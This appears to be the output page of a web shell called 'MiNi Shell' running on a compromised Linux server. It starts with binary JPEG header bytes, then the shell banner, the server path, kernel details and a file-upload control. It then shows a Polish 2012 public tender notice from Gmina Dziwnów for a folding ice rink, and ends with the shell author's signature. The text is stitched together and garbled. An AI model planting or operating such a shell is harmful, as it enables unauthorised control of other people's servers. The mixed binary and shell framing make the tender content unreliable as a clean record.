JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/231909-N-2012.html

<p class="kh_header"><b>Dziwnów: Dostawa i montaż składanego lodowiska w Dziwnowie</b><br>
<b>Numer ogłoszenia: 231909 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dziwnów , ul. Szosowa 5, 72-420 Dziwnów, woj. zachodniopomorskie, tel. 091 3275163, faks 091 3275164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dziwnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż składanego lodowiska w Dziwnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest dostawa, pierwszy montaż i uruchomienie oraz demontaż po pierwszym sezonie elementów lodowiska składanego, sezonowego o wymiarach 17 x 25 m na nawierzchni poliuretanowej boiska w kompleksie sportowym Moje Boisko Orlik 2012 w Dziwnowie, ul. Dziwna 14, w ramach pilotażowego programu rządowego Biały Orlik.
Przedmiot zamówienia w szczególności obejmuje: 
a)	Dostawę, pierwszy montaż i uruchomienie składanego lodowiska sezonowego o wym. 17 x 25 m.
Kompaktowy agregat chłodniczy o wydajności chłodniczej dla 34% roztworu glikolu etylenowego -11/-8 oC (tot = +10°C) na poziomie min. 125 kW dla sytemu chłodzącego na bazie orurowania aluminiowego. Współczynnik wydajności agregatu chłodniczego ESEER na poziomie min. 3,75. Agregat musi być wyposażony w pełen roboczy wsad czynnika na bazie freonu, dopuszczonego do stosowania i posiadającego wszelkie niezbędne atesty i zezwolenia na stosowanie. Agregat musi posiadać min. dwa obiegi chłodnicze a każdy obwód chłodniczy musi być wyposażony w przetwornik wysokiego i niskiego ciśnienia, presostat wysokiego ciśnienia. Agregat powinien zapewnić minimum cztery stopnie regulacji pracy agregatu około: 25%, 50%, 75%, 100%. Agregat musi posiadać zintegrowany (w jednej zabudowie) moduł hydrauliczny - pompa i naczynie rozszerzalne, elektroniczny wyłącznik przepływu, zawory odcinające i wyrównawcze, filtr wodny (średnica cząstek pow. 1mm), przyłącze umożliwiające pomiar spadku ciśnienia parownika oraz pomiar dostępnego ciśnienia, zawór nadmiarowy dostosowany do instalacji. Agregat musi posiadać wewnętrzny, izolowany zbiornik buforowy o pojemności min. 500l.
Panel elektryczny agregatu musi być odporny na wpływy atmosferyczne i musi być wyposażony w dostęp rewizyjny. Agregat musi być wyposażony w mikroprocesorowy moduł sterujący umożliwiający wyświetlanie informacji i kontrolę następujących elementów:
                        - temperaturę glikolu i czynnika chłodniczego,
                        - ciśnienie czynnika chłodniczego,
                        - dane diagnostyczne,
                        - harmonogram włączania/wyłączania,
                        - zabezpieczenie przed zamarznięciem parownika,
                        - sterowanie zdalne: styki bezprądowe dla awarii całego urządzenia,
                        - modyfikowanie wartości zadanych temperatur glikolu,
                        - monitorowanie wartości zadanych glikolu, temperatury powietrza otoczenia,         
                          działania agregatu, wentylatorów, pomp, alarmów sprężarek,
                        - uruchamianie lub zatrzymywanie urządzenia.
                        - sterownik pozwala na określenie temperatury na wyjściu glikolu oraz  
                           zarządza pracą pompy.
Głośność agregatu nie może powodować przekroczenia dopuszczalnego poziomu hałasu w środowisku zgodnie z Rozporządzeniem Ministra Środowiska z dnia 14.06.2007 r. w sprawie dopuszczalnych poziomów hałasu w środowisku (Dz. U. z 2007r. nr 120, poz. 826).
Cały agregat chłodniczy musi być oznakowany CE lub oznakowany znakiem budowlanym, zgodnie z art. 5 ust.1 ustawy z dn. 16.04.2004 o wyrobach budowlanych (Dz.U. Nr 92, poz. 881). 
Podłączenie elektryczne agregatu do rozdzielni elektrycznej o mocy 40 kW i zabezpieczeniu 160A posadowionej w odległości max. do 5 m od miejsca lokalizacji agregatu chłodniczego. Wykonanie przyłącza elektrycznego zakończonego rozdzielnią elektryczną i jego podłączenie jest po stronie Zamawiającego.

b)	Dostawa i montaż modułowego systemu ziębniczego tafli lodowiska.
System chłodniczy tafli lodowiska składający się z dokładanych do siebie kompozytowych modułów z orurowaniem aluminiowym o szerokości 1,0 m i długości 5,0 m. Kompozytowy moduł wykonany ma być w sposób monolityczny (poszczególne elementy są trwale zespolone z sobą) i składać się z warstwy zimnochronnej, np. styroduru XPS o grubości min. 3 cm, z trwale naniesioną na całej powierzchni warstwą stopu aluminium o grubości min. 0,4 mm stanowiącą deflektor (ekran) dla zapewnienia uzyskania równomiernego rozkładu temperatury na całej powierzchni lodowiska. Połączenie warstwy izolacji zimnochronnej oraz deflektora aluminiowego musi być wykonane na całej powierzchni styku obu elementów, w celu zapewnienia wysokiej wytrzymałości mechanicznej i trwałości całego modułu (przy wielokrotnym montażu i demontażu). Nie dopuszcza się punktowego połączenia obu elementów. Na każdym module zamontowane są prostopadle do dłuższego boku i nierozłącznie minimum trzy aluminiowe listwy dystansowe (grzebienie) utrzymujące rury chłodnicze wykonane z aluminium w stałej podziałce osiowej, co max. 65 mm. Rury ziębnicze musza być wykonane z aluminium, a ich średnica wewnętrzna powinna wynosić min. 17mm natomiast grubość ścianki 1,5mm. Otwory w listwach dystansowych muszą być zamknięte, aby uniknąć wypadania rur chłodniczych podczas montażu, demontażu, transportu i eksploatacji. Rury chłodnicze muszą przylegać do powierzchni deflektora aluminiowego dla zapewnienia dobrej wymiany chłodu do deflektora. Wzajemne łączenie aluminiowych rur chłodniczych w kolejnych modułach musi być zrealizowane za pomocą szybkozłączy zapewniających szczelność układu podczas pracy. Szybkozłącza muszą być wykonane z aluminium. 
W skład każdego modułu wchodzą trzy rury aluminiowe kolektorów, pracujące w układzie Tiechelmana. Rury poszczególnych kolektorów łączone są ze sobą szczelnie za pomocą szybkozłączy. Skrajne kolektory muszą zawierać armaturę umożliwiającą napełnianie i opróżnianie układu, odpowietrzanie i kontrolę ciśnienia. Orurowanie pierwszego modułu od strony kolektorów jest połączone z kolektorami za pomocą przewodów elastycznych. Cała powierzchnia lodowiska w obrębie band lodowiska musi być wykonana z elementów aluminiowych.

Uwaga: 
Wykonawca jest zobowiązany:
- zabezpieczyć powierzchnię pod taflą lodowiska poprzez rozłożenie na całej powierzchni folii PE o grubości min. 0,2 mm.
- zabezpieczyć całą powierzchnię pod kolektorami zasilającymi poprzez ułożenie trwałego zabezpieczenia przed uszkodzeniami mechanicznymi nawierzchni poliuretanowej, np. płyty drewnopochodnej - sklejka odporna na warunki atmosferyczne itp.

c)	Dostawa i napełnienie instalacji 34% roztworem glikolu etylenowego w ilości niezbędnej dla prawidłowej pracy układu.
Wraz z dostawą roztworu glikolu należy zapewnić odpowiednią ilość pojemników do magazynowania glikolu po zakończeniu sezonu oraz dostarczyć przenośną pompę wraz z osprzętem do wypompowania po sezonie glikolu z instalacji.

d)	Dostawa i montaż band lodowiskowych o wysokości ok. 1,1m - 1,2m
Dla zapewnienia braku odkształceń na skutek zmian temperatury oraz zapewnienia niskiej wagi i łatwości montażu bandy lodowiska mają być wykonane z kompozytu polimerowego opartego na  żywicy poliestrowej wzmocnionej włóknem szklanym. Jedna strona bandy pokryta dodatkowo żelkotem, tworzącym gładką estetyczną powłokę o dużej odporności na uszkodzenia mechaniczne oraz warunki atmosferyczne. Dodatkowo w celu wzmocnienia wytrzymałości mechanicznej każdego segmentu bandy muszą posiadać wewnętrzne użebrowanie. Banda ma być wsparta na dwóch metalowych podporach. W każdym panelu bandy mają być wklejone (zabudowane) metalowe wkładki w miejscach skręcania śrubami. W miejscu narażonym na uszkodzenia mechaniczne za pomocą łyżew ma się znajdować listwa okopowa z polietylenu w kolorze żółtym o wysokości ok.20 cm i grubości 10 mm. W górnej części bandy lodowiska ma się znajdować zintegrowany pochwyt w kolorze niebieskim. Komplet band musi zawierać bramę wjazdową dla rolby o wymiarach min. 3,2 mb oraz 2 szt. bramek wejściowych o wymiarach 0,9 m. Promień w narożnikach bandy ok. - 4,50 m.

e)	Pierwszy montaż i rozruch instalacji, wytworzenie tafli lodu ok. 5cm.
Po wykonaniu montażu należy dokonać rozruchu urządzenia i wybudować tafle lodu o grubości nie mniej niż 5 cm.

f)	Wykonanie ogrodzenia panelowego o wysokości 2m i długości 10 mb, zabezpieczającego przed dostępem osób nieupoważnionych.
Ogrodzenie zgrzewane ze stalowych drutów pionowych i poziomych, wytłaczane musi być wyposażone w furtkę wejściową o szerokości 1m z zamykaną na klucz. Słupki i panele ogrodzenia w kolorze zielonym.

g)	Dostawę chodników gumowych w ilości 60 mb i szerokości 1,2 m.
Dostawa mat gumowych ryflowanych do chodzenia na łyżwach o szerokości 1,2m, grubości min. 4mm, długości 60 mb.

h)	Dostawę nowej ostrzałki.
Elektryczna ostrzałka do łyżew z zapasowym kamieniem ściernym.

i)	Dostawę nowej suszarki.
Dostawa nowej suszarki do butów na ciepłe powietrze z dezynfekcją na min 30 par.

j)	Dostawa nowych łyżew: 50 par.
Dostawą objęte są nowe łyżwy w następujących ilościach: 
- 10 par regulowanych w rozmiarze: 29-32
- 10 par regulowanych w rozmiarze: 33-36
- 10 par regulowanych w rozmiarze: 37-40
- 2 pary w rozmiarze: 37
- 2 pary w rozmiarze: 38
- 2 pary w rozmiarze: 39
- 2 pary w rozmiarze: 40
- 2 pary w rozmiarze: 41
- 2 pary w rozmiarze: 42
- 2 pary w rozmiarze: 43
- 2 pary w rozmiarze: 44
- 2 pary w rozmiarze: 45
- 2 pary w rozmiarze: 46

k)	Demontaż sztucznego lodowiska po sezonie.
Demontaż lodowiska po zakończonym sezonie, w terminie do 14 dni po pisemnym wezwaniu przez Zamawiającego. Załadunek i transport lodowiska do miejsca składowania po zakończeniu sezonu leży w gestii Zamawiającego.

l)	Przeszkolenie pracowników wskazanych przez Zamawiającego w zakresie obsługi, montażu, uruchomienia i demontażu lodowiska.
Wykonawca wyszkoli w zakresie montażu, obsługi i demontażu lodowiska wskazanych przez Zamawiającego osób. Przeszkolenie osób ma być szkoleniem praktycznym, a więc musi odbywać się w trakcie montażu, pierwszego uruchomienia oraz demontażu lodowiska.

m)	Dostawa fabrycznie nowej maszyny do pielęgnacji tafli lodu przystosowanej do współpracy ciągnikiem.
Podstawowe dane techniczne maszyny:
-	Wysokość - max. 180 cm
-	Szerokość - max. 220 cm
-	Długość - max 120 cm
-	Ciężar w stanie pustym - max. 550 kg
-	Pojemność zbiornika na wodę - min. 300 l
-	Objętość zbiornika na śnieg - min. 0,90 m3
-	Długość noża strugającego - min. 200 cm

n)	Dostawę drewnianego garażu dla maszyny do pielęgnacji tafli lodu.
Garaż w kolorze żółtym z dachem dwuspadowym, pokrytym onduliną lub blachodachówką o wymiarach: 2,4 x 6,0 m wys. ok. 2,8 m, z drzwiami o szerokości min. 2,3 m dwuskrzydłowymi na boku krótszym (2,4 m), bez podłogi oraz bez otworów okiennych.

o)	Wykonanie utwardzenia terenu.
Teren o powierzchni 12,3 m x 12 m należy utwardzić:
- w centrum należy wyłożyć pole o wym 6 m x 4 m z płyty betonowej ażurowej wypełnionej kruszywem 8-16 mm, na podsypce o grubości 5 cm z grubej pospółki i podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0-31,5 mm o grubości 20 cm. 
- pozostałą część kostką betonową o grubości 8 cm na podsypce piaskowo cementowej o grubości 5 cm w stosunku 4:1 i podbudowie z kruszywa łamanego stabilizowanego mechanicznie 0-31,5 mm o grubości 20 cm..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.51.30.00-5, 44.16.20.00-3, 44.16.32.00-2, 37.41.12.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10.000,00 PLN, (słownie: dziesięć tysięcy złotych 00/100).
3. Wykonawca wnosi wadium: 
3.1) w pieniądzu, sposób przekazania: przelewem na konto zamawiającego: BANK PEKAO SA I/O w Kamieniu Pomorskim, nr konta  18 1240 3868 1111 0000 4093 6541  
3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest poręczeniem pieniężnym,
3.3) w gwarancjach bankowych,
3.4) w gwarancjach ubezpieczeniowych,
3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z p. zm.) sposób przekazania: oryginał dokumentu dołączyć do oferty przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zrealizowali w okresie ostatnich 3 lat przynajmniej 3 zamówienia, dostawy z montażem i rozruchem demontowalnego, sztucznego lodowiska o powierzchni min. 400 m2 każde w kwocie min. 400.000,00 zł oraz załączyć dokumenty potwierdzające, że dostawy zostały wykonane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje, protokoły odbioru</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu przewidzianego na zakończenie robót w przypadku:
1) zmiany spowodowane warunkami atmosferycznymi w szczególności:
a) klęski żywiołowe;
b) warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
2) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy; wykopaliska archeologiczne;
3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego szczególności:
a) wstrzymanie robót przez Zamawiającego;
b) konieczność usunięcia błędów lub wprowadzenia zmian;
c) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
II. Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
1) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowanych zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego
przedmiotu umowy;
3) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
III. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
2) zmiana obowiązującej stawki VAT.
3) konieczności wykonania robót dodatkowych wynikających z protokołu konieczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dziwnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI W DZIWNOWIE
SZOSOWA 5
72-420 DZIWNÓW
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 10:00, miejsce: URZĄD MIEJSKI W DZIWNOWIE
SZOSOWA 5
72-420 DZIWNÓW
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com